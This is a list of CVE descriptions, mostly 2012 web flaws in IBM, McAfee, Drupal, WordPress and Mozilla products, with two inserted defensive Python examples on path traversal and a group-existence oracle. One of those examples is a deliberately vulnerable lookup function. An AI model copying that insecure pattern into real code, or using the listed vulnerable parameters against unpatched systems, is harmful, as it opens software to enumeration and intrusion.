[CVE-2012-4825] Multiple cross-site scripting (XSS) vulnerabilities in servlet/traveler/ILNT.mobileconfig in IBM Lotus Notes Traveler before 8.5.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) userId or (2) address parameter in a getClientConfigFile action.
[CVE-2012-4824] Open redirect vulnerability in servlet/traveler in IBM Lotus Notes Traveler 8.5.3 before 8.5.3.3 Interim Fix 1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirectURL parameter.
[CVE-2012-4819] Cross-site scripting (XSS) vulnerability in InfoSphere Business Glossary 8.1.1 and 8.1.2, InfoSphere DataStage Operation Console, InfoSphere Administration, and Reporting and Repository Management Web Console in IBM InfoSphere Information Server 8.1, 8.5 before FP3, and 8.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4792] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012.
[CVE-2012-4787] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly initialized or (2) is deleted, aka "Improper Ref Counting Use After Free Vulnerability."
[CVE-2012-4782] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "CMarkup Use After Free Vulnerability."
[CVE-2012-4781] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "InjectHTMLStream Use After Free Vulnerability."
[CVE-2012-4776] The Web Proxy Auto-Discovery (WPAD) functionality in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not validate configuration data that is returned during acquisition of proxy settings, which allows remote attackers to execute arbitrary JavaScript code by providing crafted data during execution of (1) an XAML browser application (aka XBAP) or (2) a .NET Framework application, aka "Web Proxy Auto-Discovery Vulnerability."
[CVE-2012-4775] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CTreeNode Use After Free Vulnerability."
[CVE-2012-4771] Multiple cross-site scripting (XSS) vulnerabilities in Subrion CMS before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) admin/accounts/, (2) admin/manage/, or (3) admin/manage/blocks/edit/.
[CVE-2012-4751] Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) Help Desk 2.4.x before 2.4.15, 3.0.x before 3.0.17, and 3.1.x before 3.1.11 allows remote attackers to inject arbitrary web script or HTML via an e-mail message body with whitespace before a javascript: URL in the SRC attribute of an element, as demonstrated by an IFRAME element.
[CVE-2012-4747] Bugzilla 2.x and 3.x through 3.6.11, 3.7.x and 4.0.x before 4.0.8, 4.1.x and 4.2.x before 4.2.3, and 4.3.x before 4.3.3 stores potentially sensitive information under the web root with insufficient access control, which allows remote attackers to read (1) template (aka .tmpl) files, (2) other custom extension files under extensions/, or (3) custom documentation files under docs/ via a direct request.
[CVE-2012-4745] Cross-site scripting (XSS) vulnerability in admin/login.asp in Acuity CMS 2.6.2 allows remote attackers to inject arbitrary web script or HTML via the UserName parameter.
[CVE-2012-4744] Cross-site scripting (XSS) vulnerability in ssearch.php in the Siche search module 0.5 for Zeroboard allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2012-4742] The web_node_register function in web.pm in PacketFence before 3.0.2 might allow remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2012-4740] Cross-site scripting (XSS) vulnerability in the captive portal in PacketFence before 3.3.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4739] Multiple cross-site scripting (XSS) vulnerabilities in Barracuda SSL VPN before 2.2.2.203 (2012-07-05) allow remote attackers to inject arbitrary web script or HTML via the (1) policyLaunching, (2) resourcePrefix, or (3) actionPath parameter in showUserResourceCategories.do.
[CVE-2012-4689] Integer overflow in CimWebServer.exe in GE Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY 4.01 through 8.0, and Proficy Process Systems with CIMPLICITY, allows remote attackers to cause a denial of service (daemon crash) via a malformed HTTP request.
[CVE-2012-4685] Cross-site scripting (XSS) vulnerability in Arbor Networks Peakflow SP 5.1.1 before patch 6, 5.5 before patch 4, and 5.6.0 before patch 1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.
[CVE-2012-4679] Cross-site scripting (XSS) vulnerability in admin/login.php in Newscoop before 3.5.5 allows remote attackers to inject arbitrary web script or HTML via the f_user_name parameter.
[CVE-2012-4675] Cross-site scripting (XSS) vulnerability in PluXml 5.1.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to file update.
[CVE-2012-4668] Cross-site scripting (XSS) vulnerability in Roundcube Webmail 0.8.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the signature in an email.
[CVE-2012-4667] Multiple cross-site scripting (XSS) vulnerabilities in SquidClamav 5.x before 5.8 allow remote attackers to inject arbitrary web script or HTML via the (1) url, (2) virus, (3) source, or (4) user parameter to (a) clwarn.cgi, (b) clwarn.cgi.de_DE, (c) clwarn.cgi.en_EN, (d) clwarn.cgi.fr_FR, (e) clwarn.cgi.pt_BR, or (f) clwarn.cgi.ru_RU in cgi-bin/.
[CVE-2012-4655] The WebLaunch feature in Cisco Secure Desktop before 3.6.6020 does not properly validate binaries that are received by the downloader process, which allows remote attackers to execute arbitrary code via vectors involving (1) ActiveX or (2) Java components, aka Bug IDs CSCtz76128 and CSCtz78204.
[CVE-2012-4620] Cisco IOS 12.2 and 15.0 through 15.2 on Cisco 10000 series routers, when a tunnel interface exists, allows remote attackers to cause a denial of service (interface queue wedge) via tunneled (1) GRE/IP, (2) IPIP, or (3) IPv6 in IPv4 packets, aka Bug ID CSCts66808.
[CVE-2012-4616] Directory traversal vulnerability in the Web UI in EMC Data Protection Advisor (DPA) 5.6 through SP1, 5.7 through SP1, and 5.8 through SP4 allows remote attackers to read arbitrary files via unspecified vectors.
[CVE-2012-4612] Cross-site scripting (XSS) vulnerability in EMC RSA Data Protection Manager Appliance and Software Server 2.7.x and 3.x before 3.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4611] Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Adaptive Authentication On-Premise (AAOP) before 7.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4605] The default configuration of the SMTP component in Websense Email Security 6.1 through 7.3 enables weak SSL ciphers in the "SurfControl plc\SuperScout Email Filter\SMTP" registry key, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
[CVE-2012-4604] The TRITON management console in Websense Web Security before 7.6 Hotfix 24 allows remote attackers to bypass authentication and read arbitrary reports via a crafted uid field, in conjunction with a crafted userRoles field, in a cookie, as demonstrated by a request to explorer_wse/favorites.exe.
[CVE-2012-4602] Multiple cross-site scripting (XSS) vulnerabilities in admin/code/tce_select_users_popup.php in Nicola Asuni TCExam before 11.3.009 allow remote attackers to inject arbitrary web script or HTML via the (1) cid or (2) uids parameter.
[CVE-2012-4600] Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) Help Desk 2.4.x before 2.4.14, 3.0.x before 3.0.16, and 3.1.x before 3.1.10, when Firefox or Opera is used, allows remote attackers to inject arbitrary web script or HTML via an e-mail message body with nested HTML tags.
[CVE-2012-4599] McAfee SmartFilter Administration, and SmartFilter Administration Bess Edition, before 4.2.1.01 does not require authentication for access to the JBoss Remote Method Invocation (RMI) interface, which allows remote attackers to execute arbitrary code via a crafted .war file.
[CVE-2012-4598] An unspecified ActiveX control in McAfee Virtual Technician (MVT) before 6.4, and ePO-MVT, allows remote attackers to execute arbitrary code or cause a denial of service (Internet Explorer crash) via a crafted web site.
[CVE-2012-4597] Cross-site scripting (XSS) vulnerability in McAfee Email and Web Security (EWS) 5.5 through Patch 6 and 5.6 through Patch 3, and McAfee Email Gateway (MEG) 7.0.0 and 7.0.1, allows remote attackers to inject arbitrary web script or HTML via vectors related to the McAfee Security Appliance Management Console/Dashboard.
[CVE-2012-4595] McAfee Email and Web Security (EWS) 5.5 through Patch 6 and 5.6 through Patch 3, and McAfee Email Gateway (MEG) 7.0.0 and 7.0.1, allows remote attackers to bypass authentication and obtain an admin session ID via unspecified vectors.
[CVE-2012-4590] Multiple cross-site scripting (XSS) vulnerabilities in About.aspx in the Portal in McAfee Enterprise Mobility Manager (EMM) before 10.0 might allow remote attackers to inject arbitrary web script or HTML via the (1) User Agent or (2) Connection variable.
[CVE-2012-4586] McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, accesses files with the privileges of the root user, which allows remote authenticated users to bypass intended permission settings by requesting a file.
[CVE-2012-4585] McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, allows remote authenticated users to read arbitrary files via a crafted URL.
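The EMC DPA and McAfee EWS/MEG entries above (arbitrary file read via a crafted URL) share the classic root cause: a user-supplied path joined onto a base directory without checking that the result stays inside it. The Python below is an added example, not vendor code and not part of the database; the base directory and file names are constructed. It uses pure path arithmetic (posixpath) so it behaves the same on every platform; a real server should additionally resolve symlinks with os.path.realpath before the containment test.

```python
# Added example (not from the vulscan database or from any vendor):
# containment check for a user-controlled path under a fixed base directory.
import posixpath
from urllib.parse import unquote


def resolve_within(base_dir: str, requested: str):
    """Return the normalised absolute path if it lies under base_dir,
    otherwise None. `requested` is the raw value from the URL."""
    base = posixpath.normpath(base_dir)
    # Decode once here; skip this line if the framework already decoded it.
    rel = unquote(requested)
    if "\x00" in rel:                   # NUL truncation tricks in C-backed opens
        return None
    rel = rel.replace("\\", "/")        # treat backslash as a separator too
    if posixpath.isabs(rel):            # join() would discard base for "/etc/passwd"
        return None
    candidate = posixpath.normpath(posixpath.join(base, rel))
    # Compare on a separator boundary: "/srv/reports-old" must not pass
    # as being inside "/srv/reports".
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate
```

The two details practitioners most often get wrong are visible in the code: an absolute `requested` value silently replaces the base in `join()`, and a plain `startswith(base)` prefix test accepts sibling directories that merely share the base's name as a prefix.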
[CVE-2012-4584] McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, does not properly encrypt system-backup data, which makes it easier for remote authenticated users to obtain sensitive information by reading a backup file, as demonstrated by obtaining password hashes.
[CVE-2012-4583] McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, allows remote authenticated users to obtain the session tokens of arbitrary users by navigating within the Dashboard.
[CVE-2012-4582] McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, allows remote authenticated users to reset the passwords of arbitrary administrative accounts via unspecified vectors.
[CVE-2012-4581] McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, does not disable the server-side session token upon the closing of the Management Console/Dashboard, which makes it easier for remote attackers to hijack sessions by capturing a session cookie and then modifying the response to a login attempt, related to a "Logout Failure" issue.
[CVE-2012-4580] Cross-site scripting (XSS) vulnerability in McAfee Email and Web Security (EWS) 5.x before 5.5 Patch 6 and 5.6 before Patch 3, and McAfee Email Gateway (MEG) 7.0 before Patch 1, allows remote attackers to inject arbitrary web script or HTML via vectors related to the McAfee Security Appliance Management Console/Dashboard.
[CVE-2012-4579] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5.x before 3.5.2.2 allow remote authenticated users to inject arbitrary web script or HTML via a Table Operations (1) TRUNCATE or (2) DROP link for a crafted table name, (3) the Add Trigger popup within a Triggers page that references crafted table names, (4) an invalid trigger-creation attempt for a crafted table name, (5) crafted data in a table, or (6) a crafted tooltip label name during GIS data visualization, a different issue than CVE-2012-4345.
[CVE-2012-4563] Cross-site scripting (XSS) vulnerability in Google Web Toolkit (GWT) 2.4 Beta and release candidates before 2.4.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
[CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
[CVE-2012-4551] Use-after-free vulnerability in libunity-webapps before 2.4.1 allows remote attackers to cause a denial of service (memory corruption and crash) and possibly execute arbitrary code via a crafted web site, related to "certain hash tables."
[CVE-2012-4543] Multiple cross-site scripting (XSS) vulnerabilities in Red Hat Certificate System (RHCS) before 8.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) pageStart or (2) pageSize to the displayCRL script, or (3) nonce variable to the profileProcess script.
[CVE-2012-4541] Cross-site scripting (XSS) vulnerability in Piwik before 1.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4540] Off-by-one error in the invoke function in IcedTeaScriptablePluginObject.cc in IcedTea-Web 1.1.x before 1.1.7, 1.2.x before 1.2.2, and 1.3.x before 1.3.1 allows remote attackers to obtain sensitive information, cause a denial of service (crash), or possibly execute arbitrary code via a crafted webpage that triggers a heap-based buffer overflow, related to an error message and a "triggering event attached to applet."
[CVE-2012-4533] Cross-site scripting (XSS) vulnerability in the "extra" details in the DiffSource._get_row function in lib/viewvc.py in ViewVC 1.0.x before 1.0.13 and 1.1.x before 1.1.16 allows remote authenticated users with repository commit access to inject arbitrary web script or HTML via the "function name" line.
[CVE-2012-4532] Cross-site scripting (XSS) vulnerability in modules/mod_languages/tmpl/default.php in the Language Switcher module for Joomla! 2.5.x before 2.5.7 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2012-4531] Cross-site scripting (XSS) vulnerability in Joomla! 2.5.x before 2.5.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4514] rendering/render_replaced.cpp in Konqueror in KDE before 4.9.3 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted web page, related to "trying to reuse a frame with a null part."
[CVE-2012-4511] services/flickr/flickr.c in libsocialweb before 0.25.21 automatically connects to Flickr when no Flickr account is set, which might allow remote attackers to obtain sensitive information via a man-in-the-middle (MITM) attack.
[CVE-2012-4497] Cross-site scripting (XSS) vulnerability in the "3 slide gallery" in the Elegant Theme module 7.x-1.x before 7.x-1.0 for Drupal allows remote authenticated users with the "administer themes" permission to inject arbitrary web script or HTML via a slide URL.
[CVE-2012-4496] Cross-site scripting (XSS) vulnerability in the Custom Publishing Options module 6.x-1.x before 6.x-1.4 for Drupal allows remote authenticated users with the "administer nodes" permission to inject arbitrary web script or HTML via the status labels parameter.
[CVE-2012-4492] Multiple cross-site scripting (XSS) vulnerabilities in the Shorten URLs module 6.x-1.x before 6.x-1.13 and 7.x-1.x before 7.x-1.2 for Drupal allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors to the (1) report or (2) Custom Services List page.
[CVE-2012-4490] Multiple cross-site scripting (XSS) vulnerabilities in the Excluded Users module 6.x-1.x before 6.x-1.1 for Drupal allow remote attackers to inject arbitrary web script or HTML via a (1) user name or (2) email address.
[CVE-2012-4489] Open redirect vulnerability in the securelogin_secure_redirect function in the Secure Login module 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the q parameter.
[CVE-2012-4485] Multiple cross-site scripting (XSS) vulnerabilities in the galleryformatter_field_formatter_view function in galleryformatter.tpl.php in the Gallery formatter module before 7.x-1.2 for Drupal allow remote authenticated users with permissions to create a node or entity to inject arbitrary web script or HTML via the (1) title or (2) alt parameter.
[CVE-2012-4476] Cross-site scripting (XSS) vulnerability in the Drag & Drop Gallery module 6.x for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4474] Multiple cross-site scripting (XSS) vulnerabilities in the Colorbox Node module 7.x-2.x before 7.x-2.2 for Drupal allow remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2012-4469] Cross-site scripting (XSS) vulnerability in the Hashcash module 6.x-2.x before 6.x-2.6 and 7.x-2.x before 7.x-2.2 for Drupal, when "Log failed hashcash" is enabled, allows remote attackers to inject arbitrary web script or HTML via an invalid token, which is not properly handled when administrators use the Database logging module.
[CVE-2012-4468] Cross-site scripting (XSS) vulnerability in the Privatemsg module 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via a user name in a private message.
[CVE-2012-4437] Cross-site scripting (XSS) vulnerability in the SmartyException class in Smarty (aka smarty-php) before 3.1.12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors that trigger a Smarty exception.
[CVE-2012-4427] The gnome-shell plugin 3.4.1 in GNOME allows remote attackers to force the download and installation of arbitrary extensions from extensions.gnome.org via a crafted web page.
[CVE-2012-4402] webservice/lib.php in Moodle 2.1.x before 2.1.8, 2.2.x before 2.2.5, and 2.3.x before 2.3.2 does not properly restrict the use of web-service tokens, which allows remote authenticated users to run arbitrary external-service functions via a token intended for only one service.
[CVE-2012-4397] Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before 4.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) calendar displayname to part.choosecalendar.rowfields.php or (2) part.choosecalendar.rowfields.shared.php in apps/calendar/templates/
[CVE-2012-4396] Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before 4.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) file names to apps/user_ldap/settings.php
[CVE-2012-4395] Cross-site scripting (XSS) vulnerability in index.php in ownCloud before 4.0.3 allows remote attackers to inject arbitrary web script or HTML via the redirect_url parameter.
[CVE-2012-4394] Cross-site scripting (XSS) vulnerability in apps/files/js/filelist.js in ownCloud before 4.0.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter.
[CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4352] Multiple cross-site scripting (XSS) vulnerabilities in Stoneware webNetwork 6.1 before SP1 allow remote attackers to inject arbitrary web script or HTML via the blogName parameter to (1) community/blog.jsp or (2) community/blogSearch.jsp, the (3) calendarType or (4) monthNumber parameter to community/calendar.jsp, or the (5) flag parameter to swDashboard/ajax/setAppFlag.jsp.
[CVE-2012-4345] Multiple cross-site scripting (XSS) vulnerabilities in the Database Structure page in phpMyAdmin 3.4.x before 3.4.11.1 and 3.5.x before 3.5.2.2 allow remote authenticated users to inject arbitrary web script or HTML via (1) a crafted table name during table creation, or a (2) Empty link or (3) Drop link for a crafted table name.
[CVE-2012-4344] Cross-site scripting (XSS) vulnerability in Ipswitch WhatsUp Gold 15.02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving the SNMP system name of the attacking host.
[CVE-2012-4342] Multiple cross-site scripting (XSS) vulnerabilities in Gallery 3 before 3.0.4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4340] Cross-site scripting (XSS) vulnerability in Sybase EAServer before 6.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4336] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Flogr 2.5.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO or (2) an arbitrary parameter.
[CVE-2012-4303] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 11.1.1.6.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Content Server.
[CVE-2012-4283] Cross-site scripting (XSS) vulnerability in the Login With Ajax plugin before 3.0.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the callback parameter.
[CVE-2012-4278] Multiple cross-site scripting (XSS) vulnerabilities in Free Realty 3.1-0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) notes parameter to (a) admin/agenteditor.php
[CVE-2012-4277] Cross-site scripting (XSS) vulnerability in the smarty_function_html_options_optoutput function in distribution/libs/plugins/function.html_options.php in Smarty before 3.1.8 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4275] Cross-site scripting (XSS) vulnerability in Hitachi IT Operations Director 02-50-01 through 02-50-07, 03-00 before 03-00-08 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4273] Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
[CVE-2012-4272] Multiple cross-site scripting (XSS) vulnerabilities in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the "processing of the buttons of Xing and Pinterest".
[CVE-2012-4271] Multiple cross-site scripting (XSS) vulnerabilities in bad-behavior-wordpress-admin.php in the Bad Behavior plugin before 2.0.47 and 2.2.x before 2.2.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO, (2) httpbl_key, (3) httpbl_maxage, (4) httpbl_threat, (5) reverse_proxy_addresses, or (6) reverse_proxy_header parameter.
[CVE-2012-4270] Cross-site scripting (XSS) vulnerability in eFront 3.6.11 allows remote authenticated users to inject arbitrary web script or HTML via the subject box of a message.
[CVE-2012-4268] Cross-site scripting (XSS) vulnerability in bulletproof-security/admin/options.php in the BulletProof Security plugin before .47.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the HTTP_ACCEPT_ENCODING header.
[CVE-2012-4267] Cross-site scripting (XSS) vulnerability in user/register in Sockso 1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the name parameter.
[CVE-2012-4266] Cross-site scripting (XSS) vulnerability in client_details.php in Proman Xpress 5.0.1 allows remote attackers to inject arbitrary web script or HTML via the cl_comments parameter. NOTE: some of these details are obtained from third party information.
[CVE-2012-4264] Multiple cross-site scripting (XSS) vulnerabilities in the Better WP Security (better_wp_security) plugin before 3.2.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "server variables," a different vulnerability than CVE-2012-4263.
[CVE-2012-4263] Cross-site scripting (XSS) vulnerability in inc/admin/content.php in the Better WP Security (better_wp_security) plugin before 3.2.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the HTTP_USER_AGENT header.
[CVE-2012-4262] Multiple cross-site scripting (XSS) vulnerabilities in myCare2x allow remote attackers to inject arbitrary web script or HTML via the (1) name_last, (2) name_first, (3) name_middle, or (4) name_maiden parameter to modules/patient/mycare_pid.php
[CVE-2012-4259] Cross-site scripting (XSS) vulnerability in the contacts in (1) XPhone UC Web and the (2) web frontend for XPhone Virtual Directory in C4B XPhone Unified Communications (UC) 2011 Web 4.1.890S R1 allows remote attackers to inject arbitrary web script or HTML via the company name. NOTE: some of these details are obtained from third party information.
[CVE-2012-4251] Multiple cross-site scripting (XSS) vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter to index.php, (2) phase parameter to install.php, (3) tablename or (4) dbid parameter to sql.php, or (5) filename parameter to restore.php in learn/cubemail/.
[CVE-2012-4248] The Amazon Kindle Touch before 5.1.2 does not properly restrict access to the libkindleplugin.so NPAPI plugin interface, which might allow remote attackers to have an unspecified impact via vectors involving the (1) dev.log, (2) lipc.set, (3) lipc.get, or (4) todo.scheduleItems method, a different vulnerability than CVE-2012-4249.
[CVE-2012-4247] Multiple cross-site scripting (XSS) vulnerabilities in lists/admin/index.php in phpList before 2.10.19 allow remote attackers to inject arbitrary web script or HTML via the (1) remote_user, (2) remote_database, (3) remote_userprefix, (4) remote_password, or (5) remote_prefix parameter to the import4 page
[CVE-2012-4246] Multiple cross-site scripting (XSS) vulnerabilities in lists/admin/index.php in phpList before 2.10.19 allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter
[CVE-2012-4242] Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.
[CVE-2012-4238] Cross-site scripting (XSS) vulnerability in admin/code/tce_edit_answer.php in TCExam before 11.3.008 allows remote authenticated users with level 5 or greater permissions to inject arbitrary web script or HTML via the question_subject_id parameter.
[CVE-2012-4236] Cross-site scripting (XSS) vulnerability in the refresh_page function in application/modules/_main/views/_top.php in Total Shop UK eCommerce Open Source before 2.1.2_p1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2012-4231] Cross-site scripting (XSS) vulnerability in admin/index.php in jCore before 1.0pre2 allows remote attackers to inject arbitrary web script or HTML via the path parameter.
[CVE-2012-4208] The XrayWrapper implementation in Mozilla Firefox before 17.0, Thunderbird before 17.0, and SeaMonkey before 2.14 does not consider the compartment during property filtering, which allows remote attackers to bypass intended chrome-only restrictions on reading DOM object properties via a crafted web site.
[CVE-2012-4198] The User.get method in Bugzilla/WebService/User.pm in Bugzilla 3.7.x and 4.0.x before 4.0.9, 4.1.x and 4.2.x before 4.2.4, and 4.3.x and 4.4.x before 4.4rc1 has a different outcome for a groups request depending on whether a group exists, which allows remote authenticated users to discover private group names by observing whether a call throws an error.
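The Bugzilla User.get entry describes an existence oracle: the call fails differently for a private group that exists than for a name that does not, so an unprivileged caller can enumerate private group names one request at a time. The Python below is an added example, not Bugzilla code and not part of the database; the group table and the caller's memberships are constructed. It places the leaky lookup beside one whose outcome depends only on what the caller is allowed to see.

```python
# Added example (not from the vulscan database or from Bugzilla):
# a group lookup that leaks existence, beside a uniform-response version.

# Constructed group table: name -> is_private
ALL_GROUPS = {
    "everyone": False,
    "editors": False,
    "secret-team": True,
    "legal-hold": True,
}


def visible_groups(caller_groups: set) -> set:
    """Groups the caller may know about: all public ones plus private
    ones the caller is a member of."""
    return {g for g, private in ALL_GROUPS.items()
            if not private or g in caller_groups}


def lookup_leaky(name: str, caller_groups: set) -> tuple:
    """Vulnerable pattern: existence is checked before visibility, so the
    two failure cases produce different responses."""
    if name not in ALL_GROUPS:
        return ("error", "Group does not exist")
    if name not in visible_groups(caller_groups):
        return ("error", "You are not allowed to see this group")
    return ("ok", name)


def lookup_uniform(name: str, caller_groups: set) -> tuple:
    """Hardened pattern: decide only against the caller's visible set, so a
    hidden private group and a nonexistent group take the same path and
    yield the same response."""
    if name not in visible_groups(caller_groups):
        return ("error", "Group does not exist or is not visible to you")
    return ("ok", name)


def oracle_distinguishes(lookup, caller_groups: set,
                         hidden_existing: str, nonexistent: str) -> bool:
    """True if an outsider can tell a hidden group from a missing one."""
    return lookup(hidden_existing, caller_groups) != lookup(nonexistent, caller_groups)
```

Response uniformity has to cover everything observable, not just the message text: status code, exception type, and response time should also be identical for the two cases, which is why the hardened version never touches the private row on the "not visible" path.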
[CVE-2012-4195] The nsLocation::CheckURL function in Mozilla Firefox before 16.0.2, Firefox ESR 10.x before 10.0.10, Thunderbird before 16.0.2, Thunderbird ESR 10.x before 10.0.10, and SeaMonkey before 2.13.2 does not properly determine the calling document and principal in its return value, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site, and makes it easier for remote attackers to execute arbitrary JavaScript code by leveraging certain add-on behavior.
[CVE-2012-4193] Mozilla Firefox before 16.0.1, Firefox ESR 10.x before 10.0.9, Thunderbird before 16.0.1, Thunderbird ESR 10.x before 10.0.9, and SeaMonkey before 2.13.1 omit a security check in the defaultValue function during the unwrapping of security wrappers, which allows remote attackers to bypass the Same Origin Policy and read the properties of a Location object, or execute arbitrary JavaScript code, via a crafted web site.
[CVE-2012-4192] Mozilla Firefox 16.0, Thunderbird 16.0, and SeaMonkey 2.13 allow remote attackers to bypass the Same Origin Policy and read the properties of a Location object via a crafted web site, a related issue to CVE-2012-4193.
[CVE-2012-4191] The mozilla::net::FailDelayManager::Lookup function in the WebSockets implementation in Mozilla Firefox before 16.0.1, Thunderbird before 16.0.1, and SeaMonkey before 2.13.1 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unspecified vectors.
[CVE-2012-4189] Cross-site scripting (XSS) vulnerability in Bugzilla 4.1.x and 4.2.x before 4.2.4, and 4.3.x and 4.4.x before 4.4rc1, allows remote attackers to inject arbitrary web script or HTML via a field value that is not properly handled during construction of a tabular report, as demonstrated by the Version field.
[CVE-2012-4184] The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, Thunderbird before 16.0, Thunderbird ESR 10.x before 10.0.8, and SeaMonkey before 2.13 does not prevent access to properties of a prototype for a standard class, which allows remote attackers to execute arbitrary JavaScript code with chrome privileges via a crafted web site.
[CVE-2012-4178] SQL injection vulnerability in spywall/includes/deptUploads_data.php in Symantec Web Gateway 5.0.3.18 allows remote attackers to execute arbitrary SQL commands via the groupid parameter.
[CVE-2012-4177] The web browser plugin for Ubisoft Uplay PC before 2.0.4 allows remote attackers to execute arbitrary programs via the -orbit_exe_path command line argument.
[CVE-2012-4146] Opera before 12.01 allows remote attackers to cause a denial of service (application crash) via a crafted web site, as demonstrated by the Lenovo "Shop now" page.
